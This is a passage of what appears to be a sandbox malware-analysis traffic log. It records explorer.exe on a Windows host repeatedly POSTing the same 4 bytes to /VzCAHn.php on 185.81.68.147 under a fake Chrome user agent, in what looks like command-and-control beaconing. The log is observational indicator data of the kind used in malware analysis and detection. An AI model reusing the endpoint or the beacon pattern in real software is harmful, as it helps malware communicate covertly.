User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 15, 2024 09:12:26.919548988 CET | 6 | OUT | Data Raw: 48 5f 5e 57
Data Ascii: H_^W
Dec 15, 2024 09:12:28.243083954 CET | 216 | IN | HTTP/1.1 200 OK
Date: Sun, 15 Dec 2024 16:12:27 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.5 | 49744 | 185.81.68.147 | 80 | 1028 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 15, 2024 09:12:28.469675064 CET | 277 | OUT | POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 15, 2024 09:12:28.592951059 CET | 6 | OUT | Data Raw: 48 5f 5e 57
Data Ascii: H_^W
Dec 15, 2024 09:12:29.905262947 CET | 216 | IN | HTTP/1.1 200 OK
Date: Sun, 15 Dec 2024 16:12:29 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.5 | 49746 | 185.81.68.147 | 80 | 1028 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 15, 2024 09:12:30.160307884 CET | 277 | OUT | POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 15, 2024 09:12:30.280922890 CET | 6 | OUT | Data Raw: 48 5f 5e 57
Data Ascii: H_^W
Dec 15, 2024 09:12:31.759691954 CET | 216 | IN | HTTP/1.1 200 OK
Date: Sun, 15 Dec 2024 16:12:30 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.5 | 49752 | 185.81.68.147 | 80 | 1028 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 15, 2024 09:12:31.985049963 CET | 277 | OUT | POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 15, 2024 09:12:32.106182098 CET | 6 | OUT | Data Raw: 48 5f 5e 57
Data Ascii: H_^W
Dec 15, 2024 09:12:33.444749117 CET | 216 | IN | HTTP/1.1 200 OK
Date: Sun, 15 Dec 2024 16:12:32 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.5 | 49758 | 185.81.68.147 | 80 | 1028 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 15, 2024 09:12:33.672574043 CET | 277 | OUT | POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 15, 2024 09:12:33.792589903 CET | 6 | OUT | Data Raw: 48 5f 5e 57
Data Ascii: H_^W
Dec 15, 2024 09:12:35.293963909 CET | 216 | IN | HTTP/1.1 200 OK
Date: Sun, 15 Dec 2024 16:12:34 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.5 | 49764 | 185.81.68.147 | 80 | 1028 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 15, 2024 09:12:35.549963951 CET | 277 | OUT | POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 15, 2024 09:12:35.669776917 CET | 6 | OUT | Data Raw: 48 5f 5e 57
Data Ascii: H_^W
Dec 15, 2024 09:12:37.168206930 CET | 216 | IN | HTTP/1.1 200 OK
Date: Sun, 15 Dec 2024 16:12:36 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.5 | 49769 | 185.81.68.147 | 80 | 1028 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 15, 2024 09:12:37.391105890 CET | 277 | OUT | POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 15, 2024 09:12:37.510855913 CET | 6 | OUT | Data Raw: 48 5f 5e 57
Data Ascii: H_^W
Dec 15, 2024 09:12:38.860551119 CET | 216 | IN | HTTP/1.1 200 OK
Date: Sun, 15 Dec 2024 16:12:38 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.5 | 49771 | 185.81.68.147 | 80 | 1028 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 15, 2024 09:12:39.094008923 CET | 277 | OUT | POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 15, 2024 09:12:39.213953972 CET | 6 | OUT | Data Raw: 48 5f 5e 57
Data Ascii: H_^W
Dec 15, 2024 09:12:40.571070910 CET | 216 | IN | HTTP/1.1 200 OK
Date: Sun, 15 Dec 2024 16:12:39 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.5 | 49777 | 185.81.68.147 | 80 | 1028 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 15, 2024 09:12:40.799694061 CET | 277 | OUT | POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 15, 2024 09:12:40.922614098 CET | 6 | OUT | Data Raw: 48 5f 5e 57
Data Ascii: H_^W
Dec 15, 2024 09:12:42.402677059 CET | 216 | IN | HTTP/1.1 200 OK
Date: Sun, 15 Dec 2024 16:12:41 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.5 | 49783 | 185.81.68.147 | 80 | 1028 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 15, 2024 09:12:42.625920057 CET | 277 | OUT | POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 15, 2024 09:12:42.745816946 CET | 6 | OUT | Data Raw: 48 5f 5e 57
Data Ascii: H_^W
Dec 15, 2024 09:12:44.083803892 CET | 216 | IN | HTTP/1.1 200 OK
Date: Sun, 15 Dec 2024 16:12:43 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.5 | 49789 | 185.81.68.147 | 80 | 1028 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 15, 2024 09:12:44.312973022 CET | 277 | OUT | POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 15, 2024 09:12:44.432805061 CET | 6 | OUT | Data Raw: 48 5f 5e 57
Data Ascii: H_^W
Dec 15, 2024 09:12:45.743634939 CET | 216 | IN | HTTP/1.1 200 OK
Date: Sun, 15 Dec 2024 16:12:44 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.5 | 49794 | 185.81.68.147 | 80 | 1028 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 15, 2024 09:12:45.971731901 CET | 277 | OUT | POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 15, 2024 09:12:46.091593027 CET | 6 | OUT | Data Raw: 48 5f 5e 57
Data Ascii: H_^W
Dec 15, 2024 09:12:47.424607038 CET | 216 | IN | HTTP/1.1 200 OK
Date: Sun, 15 Dec 2024 16:12:46 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.5 | 49796 | 185.81.68.147 | 80 | 1028 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 15, 2024 09:12:47.658782959 CET | 277 | OUT | POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 15, 2024 09:12:47.779369116 CET | 6 | OUT | Data Raw: 48 5f 5e 57
Data Ascii: H_^W
Dec 15, 2024 09:12:49.104778051 CET | 216 | IN | HTTP/1.1 200 OK
Date: Sun, 15 Dec 2024 16:12:48 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.5 | 49802 | 185.81.68.147 | 80 | 1028 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 15, 2024 09:12:49.339306116 CET | 277 | OUT | POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 15, 2024 09:12:49.459721088 CET | 6 | OUT | Data Raw: 48 5f 5e 57
Data Ascii: H_^W
Dec 15, 2024 09:12:50.951261044 CET | 216 | IN | HTTP/1.1 200 OK
Date: Sun, 15 Dec 2024 16:12:49 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.5 | 49808 | 185.81.68.147 | 80 | 1028 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 15, 2024 09:12:51.189982891 CET | 277 | OUT | POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 15, 2024 09:12:51.310628891 CET | 6 | OUT | Data Raw: 48 5f 5e 57
Data Ascii: H_^W
Dec 15, 2024 09:12:52.646693945 CET | 216 | IN | HTTP/1.1 200 OK
Date: Sun, 15 Dec 2024 16:12:51 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.5 | 49813 | 185.81.68.147 | 80 | 1028 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 15, 2024 09:12:52.876112938 CET | 277 | OUT | POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 15, 2024 09:12:52.995955944 CET | 6 | OUT | Data Raw: 48 5f 5e 57
Data Ascii: H_^W
Dec 15, 2024 09:12:54.501616955 CET | 216 | IN | HTTP/1.1 200 OK
Date: Sun, 15 Dec 2024 16:12:53 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.5 | 49819 | 185.81.68.147 | 80 | 1028 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 15, 2024 09:12:54.734743118 CET | 277 | OUT | POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 15, 2024 09:12:54.854842901 CET | 6 | OUT | Data Raw: 48 5f 5e 57
Data Ascii: H_^W
Dec 15, 2024 09:12:56.181477070 CET | 216 | IN | HTTP/1.1 200 OK
Date: Sun, 15 Dec 2024 16:12:55 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.5 | 49822 | 185.81.68.147 | 80 | 1028 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 15, 2024 09:12:56.408164024 CET | 277 | OUT | POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 15, 2024 09:12:56.528753042 CET | 6 | OUT | Data Raw: 48 5f 5e 57
Data Ascii: H_^W
Dec 15, 2024 09:12:57.879736900 CET | 216 | IN | HTTP/1.1 200 OK
Date: Sun, 15 Dec 2024 16:12:57 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.5 | 49828 | 185.81.68.147 | 80 | 1028 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 15, 2024 09:12:58.109808922 CET | 277 | OUT | POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 15, 2024 09:12:58.229659081 CET | 6 | OUT | Data Raw: 48 5f 5e 57
Data Ascii: H_^W
Dec 15, 2024 09:12:59.572005987 CET | 216 | IN | HTTP/1.1 200 OK
Date: Sun, 15 Dec 2024 16:12:58 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.5 | 49834 | 185.81.68.147 | 80 | 1028 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 15, 2024 09:12:59.799293041 CET | 277 | OUT | POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 15, 2024 09:12:59.919336081 CET | 6 | OUT | Data Raw: 48 5f 5e 57
Data Ascii: H_^W
Dec 15, 2024 09:13:01.245629072 CET | 216 | IN | HTTP/1.1 200 OK
Date: Sun, 15 Dec 2024 16:13:00 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.5 | 49839 | 185.81.68.147 | 80 | 1028 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 15, 2024 09:13:01.471685886 CET | 277 | OUT | POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 15, 2024 09:13:01.591506004 CET | 6 | OUT | Data Raw: 48 5f 5e 57
Data Ascii: H_^W
Dec 15, 2024 09:13:02.926867008 CET | 216 | IN | HTTP/1.1 200 OK
Date: Sun, 15 Dec 2024 16:13:02 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.5 | 49841 | 185.81.68.147 | 80 | 1028 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 15, 2024 09:13:03.162955999 CET | 277 | OUT | POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 15, 2024 09:13:03.282857895 CET | 6 | OUT | Data Raw: 48 5f 5e 57
Data Ascii: H_^W
Dec 15, 2024 09:13:04.771467924 CET | 216 | IN | HTTP/1.1 200 OK
Date: Sun, 15 Dec 2024 16:13:03 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.5 | 49847 | 185.81.68.147 | 80 | 1028 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 15, 2024 09:13:05.002820015 CET | 277 | OUT | POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 15, 2024 09:13:05.122658968 CET | 6 | OUT | Data Raw: 48 5f 5e 57
Data Ascii: H_^W
Dec 15, 2024 09:13:06.460823059 CET | 216 | IN | HTTP/1.1 200 OK
Date: Sun, 15 Dec 2024 16:13:05 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.5 | 49853 | 185.81.68.147 | 80 | 1028 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 15, 2024 09:13:06.688276052 CET | 277 | OUT | POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 15, 2024 09:13:06.808378935 CET | 6 | OUT | Data Raw: 48 5f 5e 57
Data Ascii: H_^W
Dec 15, 2024 09:13:08.304063082 CET | 216 | IN | HTTP/1.1 200 OK
Date: Sun, 15 Dec 2024 16:13:07 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.5 | 49859 | 185.81.68.147 | 80 | 1028 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 15, 2024 09:13:08.533384085 CET | 277 | OUT | POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 15, 2024 09:13:08.653465033 CET | 6 | OUT | Data Raw: 48 5f 5e 57
Data Ascii: H_^W
Dec 15, 2024 09:13:09.989485025 CET | 216 | IN | HTTP/1.1 200 OK
Date: Sun, 15 Dec 2024 16:13:09 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.5 | 49864 | 185.81.68.147 | 80 | 1028 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 15, 2024 09:13:10.219285965 CET | 277 | OUT | POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 15, 2024 09:13:10.339353085 CET | 6 | OUT | Data Raw: 48 5f 5e 57
Data Ascii: H_^W
Dec 15, 2024 09:13:11.655054092 CET | 216 | IN | HTTP/1.1 200 OK
Date: Sun, 15 Dec 2024 16:13:10 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.5 | 49866 | 185.81.68.147 | 80 | 1028 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 15, 2024 09:13:11.890993118 CET | 277 | OUT | POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 15, 2024 09:13:12.010981083 CET | 6 | OUT | Data Raw: 48 5f 5e 57
Data Ascii: H_^W
Dec 15, 2024 09:13:13.353156090 CET | 216 | IN | HTTP/1.1 200 OK
Date: Sun, 15 Dec 2024 16:13:12 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.5 | 49872 | 185.81.68.147 | 80 | 1028 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 15, 2024 09:13:13.578705072 CET | 277 | OUT | POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 15, 2024 09:13:13.698465109 CET | 6 | OUT | Data Raw: 48 5f 5e 57
Data Ascii: H_^W
Dec 15, 2024 09:13:15.025616884 CET | 216 | IN | HTTP/1.1 200 OK
Date: Sun, 15 Dec 2024 16:13:14 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.5 | 49878 | 185.81.68.147 | 80 | 1028 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 15, 2024 09:13:15.250941038 CET | 277 | OUT | POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 15, 2024 09:13:15.370851994 CET | 6 | OUT | Data Raw: 48 5f 5e 57
Data Ascii: H_^W
Dec 15, 2024 09:13:16.727989912 CET | 216 | IN | HTTP/1.1 200 OK
Date: Sun, 15 Dec 2024 16:13:15 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.5 | 49883 | 185.81.68.147 | 80 | 1028 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 15, 2024 09:13:16.953332901 CET | 277 | OUT | POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
